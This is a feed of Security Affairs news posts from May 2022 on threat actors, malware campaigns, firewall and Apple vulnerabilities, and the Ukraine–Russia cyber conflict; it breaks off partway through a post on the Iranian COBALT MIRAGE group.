Security Affairs

Subscribe to Security Affairs feed
Read, think, share … Security is everyone's responsibility
Updated: 1 week 2 days ago

Reuters: Russia-linked APT behind Brexit leak website

Sat, 05/28/2022 - 09:30
Russia-linked threat actors are behind a new website that published leaked emails from leading proponents of Britain’s exit from the EU, the Reuters reported.

According to a Google cybersecurity official and the former head of UK foreign intelligence, the “Very English Coop d’Etat” website was set up to publish private emails from Brexit supporters, including former British MI6 chief Richard Dearlove, leading Brexit campaigner Gisela Stuart, and historian Robert Tombs.

According to Reuters, at least victims of the leak confirmed the authenticity of the messages and revealed they were targeted by Russia-linked hackers.

Google’s Threat Analysis Group (TAG) chief Shane Huntley told Reuters was set up by a Russia-linked APT dubbed “Cold River

At this time it is unclear how the website has obtained the sensitive emails, Reuters pointed out that most of the messages mainly appear to have been exchanged using ProtonMail accounts.

“The “English Coop” site makes a variety of allegations, including one that Dearlove was at the center of a conspiracy by Brexit hardliners to oust former British Prime Minister Theresa May, who had negotiated a withdrawal agreement with the European Union in early 2019, and replace her with Johnson, who took a more uncompromising position.” reported the Reuters. “Dearlove said that the emails captured a “legitimate lobbying exercise which, seen through this antagonistic optic, is now subject to distortion.””

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Brexit)

The post Reuters: Russia-linked APT behind Brexit leak website appeared first on Security Affairs.

Categories: Cyber Security News

Over 200 Apps on Play Store were distributing Facestealer info-stealer

Tue, 05/17/2022 - 07:43
Experts spotted over 200 Android apps on the Play Store distributing spyware called Facestealer used to steal sensitive data.

Trend Micro researchers spotted over 200 Android apps on the Play Store distributing spyware called Facestealer used to steal sensitive data from infected devices. The malicious apps are able to steal credentials, Facebook cookies, and other personally identifiable information.

Some of the malicious apps discovered by the experts have been installed over a hundred thousand times.

The Facestealer spyware was first spotted on July 2021 by Dr. Web researchers, the development team behind the threat has frequently changed its code.

Most of the malicious apps were VPN software (42), followed by Camera (20), and Photo Editing (13).

Trend Micro researchers also discovered 40 fake cryptocurrency miner apps that are variants of similar apps that they discovered in August 2021. The apps deceive users into subscribing to paid services or clicking on ads.

“Facestealer apps are disguised as simple tools — such as virtual private network (VPN), camera, photo editing, and fitness apps — making them attractive lures to people who use these types of apps. Because of how Facebook runs its cookie management policy, we feel that these types of apps will continue to plague Google Play.” concludes the report published by Trend Micro. “As for the fake cryptocurrency miner apps, their operators not only try to profit from their victims by duping them into buying fake cloud-based cryptocurrency-mining services, but they also try to harvest private keys and other sensitive cryptocurrency-related information from users who are interested in what they offer. Looking into the future, we believe that other methods of stealing private keys and mnemonic phrases are likely to appear.”

The report includes Indicators of compromise (IOCs) for these malicious apps.

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – malware, Facestealer)

The post Over 200 Apps on Play Store were distributing Facestealer info-stealer appeared first on Security Affairs.

Categories: Cyber Security News

CISA adds CVE-2022-30525 flaw in Zyxel Firewalls to its Known Exploited Vulnerabilities Catalog

Tue, 05/17/2022 - 03:11
US Critical Infrastructure Security Agency (CISA) adds critical CVE-2022-30525 RCE flaw in Zyxel Firewalls to its Known Exploited Vulnerabilities Catalog.

The U.S. Cybersecurity and Infrastructure Security Agency added the recently disclosed remote code execution bug, tracked as CVE-2022-30525, affecting Zyxel firewalls, to its Known Exploited Vulnerabilities Catalog.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

Last week, Zyxel has addressed the critical CVE-2022-30525 (CVSS score: 9.8) affecting Zyxel firewall devices that enables unauthenticated and remote attackers to gain arbitrary code execution as the “nobody” user.

The vulnerability was discovered by Rapid7 which reported it on April 13. Zyxel silently addressed the flaw by releasing security updates on April 28, 2022, Rapid7 pointed out that this choice leaves defenders in the dark and only advantages the attackers.

“The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the nobody user.” reads the report published by Rapid7.

Below is the list of vulnerable products and related patches:

AFFECTED MODELAFFECTED FIRMWARE VERSIONPATCH AVAILABILITYUSG FLEX 100(W), 200, 500, 700ZLD V5.00 through ZLD V5.21 Patch 1ZLD V5.30USG FLEX 50(W) / USG20(W)-VPNZLD V5.10 through ZLD V5.21 Patch 1ZLD V5.30ATP seriesZLD V5.10 through ZLD V5.21 Patch 1ZLD V5.30VPN seriesZLD V4.60 through ZLD V5.21 Patch 1ZLD V5.30

According to Rapid 7, there are more than 15,000 internet-facing vulnerable systems tracked by the Shodan search engine. The researchers also developed a Metasploit module for this issue and published a video PoC of the attack:

“Apply the vendor patch as soon as possible. If possible, enable automatic firmware updates. Disable WAN access to the administrative web interface of the system.” concludes the report.

Researchers at Shadowserver Foundation reported they started observing exploitation attempts of CVE-2022-30525 starting on May 13th. The experts claim that at least 20 800 of the potentially affected Zyxel firewall models (by unique IP) are exposed online, the majority of the CVE-2022-30525 affected models are in the EU – France (4.5K) and Italy (4.4K) and the US (2.4K).

We see at least 20 800 of the potentially affected Zyxel firewall models (by unique IP) accessible on the Internet. Most popular are USG20-VPN (10K IPs) and USG20W-VPN (5.7K IPs).

Most of the CVE-2022-30525 affected models are in the EU – France (4.5K) and Italy (4.4K). pic.twitter.com/Wh7I8JCvVv

— Shadowserver (@Shadowserver) May 15, 2022

Cisa also added the CVE-2022-22947 code injection vulnerability in Spring Cloud Gateway to the catalog. A remote attacker could send specially-crafted requests to vulnerable systems to gain arbitrary code execution. Last week, Microsoft experts reported that the Sysrv-K botnet is exploiting this issue to take over the vulnerable web servers.

Both issues have to be addressed by federal agencies by June 6.

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, domain name system)

The post CISA adds CVE-2022-30525 flaw in Zyxel Firewalls to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

Categories: Cyber Security News

A custom PowerShell RAT uses to target German users using Ukraine crisis as bait

Tue, 05/17/2022 - 01:19
Researchers spotted a threat actor using a custom PowerShell RAT targeting German users to gain intelligence on the Ukraine crisis.

Malwarebytes experts uncovered a campaign that targets German users with custom PowerShell RAT targeting. The threat actors attempt to trick victims into opening weaponized documents by using the current situation in Ukraine as bait.

The attackers registered a decoy site that was an expired German domain name at collaboration-bw[.]de. The site was hosting a bait document, named “2022-Q2-Bedrohungslage-Ukraine,” used to deliver the custom malware. The document appears to contain information about the current crisis in Ukraine.

The download page contains a blue download button and the text on the page claims that the document provides important information about the current threat posed by the Ukraine crisis. According to the site, the document is constantly updated.

Upon clicking on the bottom, a ZIP archive is downloaded on the victim’s computer. The compressed archive contains a CHM file consisting of several compiled HTML files. If the victim opens the HTML files, they are displayed an error message, while the PowerShell runs a Base64 command.

“After de-obfuscating the command we can see it is designed to execute a script downloaded from the fake Baden-Württemberg website, using Invoke-Expression (IEX).” reads the analysis published by MalwareBytes.

“The downloaded script creates a folder called SecuriyHealthService in the current user directory and drops two files into it: MonitorHealth.cmd and a script called Status.txt. The .cmd file is very simple and just executes Status.txt through PowerShell.”

The MonitorHealth.cmd achieves persistence by creating a scheduled task that will execute it each day at a specific time.

The PowerShell RAT collects basic system information and exfiltrates it to the domain “kleinm[.]de”.

The script bypasses the Windows Antimalware Scan Interface (AMSI) using an AES-encrypted function called bypass. It is decrypted using a generated key and IV before execution.

The malicious code builds a unique id for the victim and exfiltrates data as a JSON data structure sent to the C2 server via a POST request.

The RAT supports the following capabilities:

  • Download (type: D0WNl04D): Download files from server
  • Upload (type: UPL04D): Upload file to the server
  • LoadPS1 (type: L04DPS1): Load and execute a PowerShell script
  • Command (type: C0MM4ND): Execute a specific command

“It is not easy to attribute this activity to a specific actor, and there are no solid indicators to support attribution. Based on motivation alone, we hypothesise that a Russian threat actor could be targeting German users, but without clear connections in infrastructure or similarities to known TTPs, such attribution is weak.” concludes the report that includes indicators of compromise (IoCs).

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, domain name system)

The post A custom PowerShell RAT uses to target German users using Ukraine crisis as bait appeared first on Security Affairs.

Categories: Cyber Security News

Apple fixes the sixth zero-day since the beginning of 2022

Mon, 05/16/2022 - 16:27
Apple released security updates to address a zero-day bug actively exploited in attacks against Macs and Apple Watch devices.

Apple has addressed a zero-day vulnerability, tracked as CVE-2022-22675, actively exploited in attacks aimed at Macs and Apple Watch devices.

The flaw is an out-of-bounds write issue that resides in the AppleAVD, it can lead to arbitrary code execution with kernel privileges.

“An application may be able to execute arbitrary code with kernel privileges.” reads the advisory published by Apple. “An out-of-bounds write issue was addressed with improved bounds checking. Apple is aware of a report that this issue may have been actively exploited.”

The IT giant impacted macOS Big Sur and Apple Watch Series 3 or later, the company fixed the issue with the release of macOS Big Sur 11.6.6 and watchOS 8.6. Users have to install the updates as soon as possible.

This is the sixth zero-day addressed by Apple since January, below is the list of fixed issues:

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Apple)

The post Apple fixes the sixth zero-day since the beginning of 2022 appeared first on Security Affairs.

Categories: Cyber Security News

Experts show how to run malware on chips of a turned-off iPhone

Mon, 05/16/2022 - 10:48
Researchers devised an attack technique to tamper the firmware and execute a malware onto a Bluetooth chip when an iPhone is “off.”

A team of researchers from the Secure Mobile Networking Lab (SEEMOO) at the Technical University of Darmstadt demonstrated a technique to tamper with the firmware and load malware onto a chip while an iPhone is “OFF.”

Experts pointed out that when an iPhone is turned off, most wireless chips (Bluetooth, Near Field Communication (NFC), and Ultra-wideband (UWB)) continue to operate.

The Bluetooth and UWB chips are hardwired to the Secure Element (SE) in the NFC chip, storing secrets that should be available in LPM,” the researchers said.

The Low-Power Mode was implements with iOS 15, it is supported by iPhone 11, iPhone 12, and iPhone 13 devices.

Many users are not aware of these features, even if they are aware that their iPhone remains locable even when the device was turned off.

The experts mentioned the case of a user-initiated shutdown during which the iPhone remains locatable via the Find My network.

The researchers focused their analysis on how Apple implements standalone wireless features while the iOS is not running, they also discovered that the wireless chips have direct access to the secure element.

“LPM [Low Power Mode] support is implemented in hardware. The Power Management Unit (PMU) can turn on chips individually. The Bluetooth and UWB chips are hardwired to the Secure Element (SE) in the NFC chip, storing secrets that should be available in LPM. Since LPM support is implemented in hardware, it cannot be removed by changing software components.” reads the paper published by the researchers. “As a result, on modern iPhones, wireless chips can no longer be trusted to be turned off after shutdown. This poses a new threat model. Previous work only considered that journalists are not safe against espionage when enabling airplane mode in case their smartphones were compromised”

The experts explained that a threat actor has different options to tamper with firmware, which depend on their preconditions. Unlike NFC and UWB chips, the Bluetooth firmware is neither signed nor encrypted opening the doors to modification.

An attacker with privileged access can exploit this bug to develop a malware that can run on an iPhone Bluetooth chip even when it is off.

“The current LPM implementation on Apple iPhones is opaque and adds new threats. Since LPM support is based on the iPhone’s hardware, it cannot be removed with system updates. Thus, it has a long-lasting effect on the overall iOS security model.” concludes the paper. “To the best of our knowledge, we are the first who looked into undocumented LPM features introduced in iOS 15 and uncover various issues. Design of LPM features seems to be mostly driven by functionality, without considering threats outside of the intended applications. Find My after power off turns shutdown iPhones into tracking devices by design, and the implementation within the Bluetooth firmware is not secured against manipulation. Tracking properties could stealthily be changed by attackers with system-level access.”

The researchers will present the results of their study at the ACM Conference on Security and Privacy in Wireless and Mobile Networks (WiSec 2022).

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, domain name system)

The post Experts show how to run malware on chips of a turned-off iPhone appeared first on Security Affairs.

Categories: Cyber Security News

Ukrainian national sentenced to 4 years in prison for selling access to hacked servers

Mon, 05/16/2022 - 06:36
A 28-year-old Ukrainian national has been sentenced to four years in prison for selling access to hacked servers.

Glib Oleksandr Ivanov-Tolpintsev, a 28-year-old Ukrainian national, has been sentenced to four years in prison for selling access to comprised servers on the dark web. The man was arrested in Poland in October 2020 and pleaded guilty to his charges in February. In September, he was extradited to the U.S. in September 2021. Ivanov-Tolpintsev was charged with conspiracy, trafficking in unauthorized access devices, and trafficking in computer passwords.

The man controlled a botnet to conduct brute-force attacks and guess computer login credentials. He was able to gather login credentials of at least 2,000 computers every week, then they were offered for sale on the dark web to facilitate a wide range of illegal activity.

The man was offering over 700,000 compromised servers for sale on an unnamed marketplace.

“According to court documents, the “Marketplace” was a dark web website that illegally sold login credentials (usernames and passwords) to servers located across the world and personally identifiable information (dates of birth and Social Security numbers) of U.S. residents. Once purchased, criminals used these servers to facilitate a wide range of illegal activity that included ransomware attacks and tax fraud. In total, the Marketplace offered more than 700,000 compromised servers for sale including at least 150,000 in the United States and at least 8,000 in Florida.” reads the press release published by the DoJ. “Marketplace victims spanned the globe and industries, including local, state, and federal government infrastructure, hospitals, 911 and emergency services, call centers, major metropolitan transit authorities, accounting and law firms, pension funds, and universities.”

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Ukrainian national)

The post Ukrainian national sentenced to 4 years in prison for selling access to hacked servers appeared first on Security Affairs.

Categories: Cyber Security News

Eternity Project: You can pay $260 for a stealer and $490 for a ransomware

Mon, 05/16/2022 - 01:28
Researchers from threat intelligence firm Cyble analyzed the Eternity Project Tor website which offers any kind of malicious code.

Researchers at cybersecurity firm Cyble analyzed a Tor website named named ‘Eternity Project’ that offers for sale a broad range of malware, including stealers, miners, ransomware, and DDoS Bots.

The experts discovered the marketplace during a routine investigation, they also discovered that its operators also have a Telegram channel with around 500 subscribers. The channel was used to share information about malware listings and updates.

The operators behind the project allow their customers to customize the binary features through the Telegram channel.  

Eternity Stealer

The operators sell the Stealer module for $260 as an annual subscription, it allows to steal a lot of sensitive information from infected systems, including passwords, cookies, credit cards, and crypto-wallets. Stolen data are exfiltrated via Telegram Bot.

The Eternity Miner module goes for $90 as an annual subscription, customers can customize it with their own Monero pool and AntiVM features. The Eternity operators also sells the clipper malware for $110, it monitors the clipboard for cryptocurrency wallets and replaces them with the wallet address of the attackers,

The Eternity Ransomware goes for $490 while the Eternity Worm is available for $390.

According to Cyble, the operators behind the Eternity Project are also developing a DDoS Bot malware borrowing code from the existing Github repository. The experts speculate that the Jester Stealer could also be rebranded from this particular Github project which indicates some links between the two Threat Actors.

“Cyble Research Labs has observed a significant increase in cybercrime through Telegram channels and cybercrime forums where TAs sell their products without any regulation. We have encountered the Eternity products being sold on one such Telegram channel and TOR website.” concludes Cyble, which also shared Indicators of Compromise (IoCs) for this threat.

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post Eternity Project: You can pay $260 for a stealer and $490 for a ransomware appeared first on Security Affairs.

Categories: Cyber Security News

May 08 – May 14 Ukraine – Russia the silent cyber conflict

Sun, 05/15/2022 - 12:47
This post provides a timeline of the events related to Russia invasion of Ukraine from the cyber security perspective.

Below is the timeline of the events related to the ongoing Russia invasion that occurred in the previous weeks:

May 14 – The LEGION collective calls to action to attack the final of the Eurovision song contest

The Pro-Russian volunteer movement known as LEGION is calling to launch DDoS attacks against the final of the Eurovision song contest.

May 14 – OpRussia update: Anonymous breached other organizations

Another week has passed and Anonymous has hacked other Russian companies and leaked their data via DDoSecrets.

May 14 – Pro-Russian hacktivists target Italy government websites

Pro-Russian hacker group Killnet targeted the websites of several Italian institutions, including the senate and the National Institute of Health.

May 11 – EU condemns Russian cyber operations against Ukraine

The European Union condemns the cyberattacks conducted by Russian entities against Ukraine, which targeted the satellite KA-SAT network.

May 10 – Hacktivists hacked Russian TV schedules during Victory Day and displayed anti-war messages

Hacktivists yesterday defaced the Russian TV with pro-Ukraine messages and took down the RuTube video streaming site.

May 9 – CERT-UA warns of malspam attacks distributing the Jester info stealer

The Computer Emergency Response Team of Ukraine (CERT-UA) warns of attacks spreading info-stealing malware Jester Stealer.

The U.S. government offers up to $10 million for info that allows to identify or locate six Russian GRU hackers who are members of the Sandworm APT group.

Feb 27- Mar 05 Ukraine – Russia the silent cyber conflict Feb 7- Feb 27 Ukraine – Russia the silent cyber conflict Mar 06- Mar 12 Ukraine – Russia the silent cyber conflict Mar 13- Mar 19 Ukraine – Russia the silent cyber conflict Mar 20- Mar 26 Ukraine – Russia the silent cyber conflict Mar 27 – Apr 02 Ukraine – Russia the silent cyber conflict Apr 03 – Apr 09 Ukraine – Russia the silent cyber conflict Apr 10 – Apr 16 Ukraine – Russia the silent cyber conflict Apr 17 – Apr 23 Ukraine – Russia the silent cyber conflict Apr 24 – Apr 30 Ukraine – Russia the silent cyber conflict

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

May 01 – May 07 Ukraine – Russia the silent cyber conflict

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Ukraine)

The post May 08 – May 14 Ukraine – Russia the silent cyber conflict appeared first on Security Affairs.

Categories: Cyber Security News

Security Affairs newsletter Round 365 by Pierluigi Paganini

Sun, 05/15/2022 - 10:34
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs for free in your email box.

If you want to also receive for free the newsletter with the international press subscribe here.

The LEGION collective calls to action to attack the final of the Eurovision song contestOpRussia update: Anonymous breached other organizationsPro-Russian hacktivists target Italy government websitesSonicWall urges customers to fix SMA 1000 vulnerabilitiesZyxel fixed firewall unauthenticated remote command injection issueIran-linked COBALT MIRAGE group uses ransomware in its operationsNew Nerbian RAT spreads via malspam campaigns using COVID-19Massive hacking campaign compromised thousands of WordPress websites
Red TIM Research (RTR) founds 2 bugs affecting F5 Traffix SDC
Five Eyes agencies warn of attacks on MSPsCISA adds CVE-2022-1388 flaw in F5 BIG-IP to its Known Exploited Vulnerabilities CatalogMicrosoft Patch Tuesday updates for May 2022 fixes 3 zero-days, 1 under active attackEU condemns Russian cyber operations against UkraineMicrosoft fixed RCE flaw in a driver used by Azure Synapse and Data FactoryHacktivists hacked Russian TV schedules during Victory Day and displayed anti-war messagesThreat actors are actively exploiting CVE-2022-1388 RCE in F5 BIG-IPExclusive: Welcome “Frappo” – Resecurity identified a new Phishing-as-a-ServiceDCRat, only $5 for a fully working remote access trojan
CERT-UA warns of malspam attacks distributing the Jester info stealer
Experts developed exploits for CVE-2022-1388 RCE in F5 BIG-IP productsExperts uncovered a new wave of attacks conducted by Mustang PandaConti ransomware claims to have hacked Peru MOF – Dirección General de Inteligencia (DIGIMIN)May 01 – May 07 Ukraine – Russia the silent cyber conflictNIST published updated guidance for supply chain risksUS agricultural machinery manufacturer AGCO suffered a ransomware attackSecurity Affairs newsletter Round 364 by Pierluigi PaganiniUS DoS offers a reward of up to $15M for info on Conti ransomware gang

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 365 by Pierluigi Paganini appeared first on Security Affairs.

Categories: Cyber Security News

Ukraine CERT-UA warns of new attacks launched by Russia-linked Armageddon APT

Sun, 05/15/2022 - 08:48
Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign conducted by Armageddon APT using GammaLoad.PS1_v2 malware.

Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign using messages with subject “On revenge in Kherson!” and containing the “Plan Kherson.htm” attachment.

The HTM-file will decode and create an archive named “Herson.rar”, which contains a file-shortcut named “Plan of approach and planting explosives on the objects of critical infrastructure of Kherson.lnk”.

Upon clicking on the link file, the HTA-file “precarious.xml” is loaded and executed leading to the creation and execution of files “desktop.txt” and “user.txt”.

In the last stage of the attack chain, the GammaLoad.PS1_v2 malware is downloaded and executed on the victim’s computer.

The government experts attributes the attack to the Russia-linked Armageddon APT (UAC-0010) (aka Gamaredon, Primitive Bear, Armageddon, Winterflounder, or Iron Tilden) which was involved in a long string of attacks against the local state organizations. 

“As a result, the malicious program GammaLoad.PS1_v2 will be downloaded to the computer (the mechanism of taking a screenshot and sending it to the management server has been implemented).” reads the advisory published by CERT-UA. “The activity is carried out by the group UAC-0010 (Armageddon).”

The Ukrainian CERT shared the indicators of compromise (IoCs) for this campaign.

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, CERT-UA)

The post Ukraine CERT-UA warns of new attacks launched by Russia-linked Armageddon APT appeared first on Security Affairs.

Categories: Cyber Security News

Zyxel fixed firewall unauthenticated remote command injection issue

Fri, 05/13/2022 - 10:52
Zyxel addressed a critical flaw affecting Zyxel firewall devices that allows unauthenticated, remote attackers to gain arbitrary code execution.

Zyxel has moved to address a critical security vulnerability (CVE-2022-30525, CVSS score: 9.8) affecting Zyxel firewall devices that enables unauthenticated and remote attackers to gain arbitrary code execution as the “nobody” user.

The issue was discovered by Rapid7 which reported it on April 13.

Zyxel silently addressed the flaw by releasing security updates on April 28, 2022, Rapid7 pointed out that this choice leaves defenders in the dark and only advantage the attackers.

“The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the nobody user.” reads the report published by Rapid7.

Below is the list of vulnerable products and related patches:

Affected modelAffected firmware versionPatch availabilityUSG FLEX 100(W), 200, 500, 700ZLD V5.00 through ZLD V5.21 Patch 1ZLD V5.30USG FLEX 50(W) / USG20(W)-VPNZLD V5.10 through ZLD V5.21 Patch 1ZLD V5.30ATP seriesZLD V5.10 through ZLD V5.21 Patch 1ZLD V5.30VPN seriesZLD V4.60 through ZLD V5.21 Patch 1ZLD V5.30

According to Rapid 7, there are more than 15,000 internet-facing vulnerable systems tracked by the Shodan search engine. The researchers also developed a Metasploit module for this issue and published a video PoC of the attack:

“Apply the vendor patch as soon as possible. If possible, enable automatic firmware updates. Disable WAN access to the administrative web interface of the system.” concludes the report.

The vendor the following issues in its VMG3312-T20A wireless router and AP Configurator:

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Zyxel)

The post Zyxel fixed firewall unauthenticated remote command injection issue appeared first on Security Affairs.

Categories: Cyber Security News

Iran-linked COBALT MIRAGE group uses ransomware in its operations

Fri, 05/13/2022 - 02:52
Iranian group used Bitlocker and DiskCryptor in a series of attacks targeting organizations in Israel, the US, Europe, and Australia.

Researchers at Secureworks Counter Threat Unit (CTU) are investigating a series of attacks conducted by the Iran-linked COBALT MIRAGE APT group. The threat actors have been active since at least June 2020 and are linked to the Iranian COBALT ILLUSION group (aka APT35, Charming Kitten, PHOSPHOROUS and TunnelVision).

The researchers identified two distinct clusters of intrusions (labeled as Cluster A and Cluster B) associated with COBALT MIRAGE.

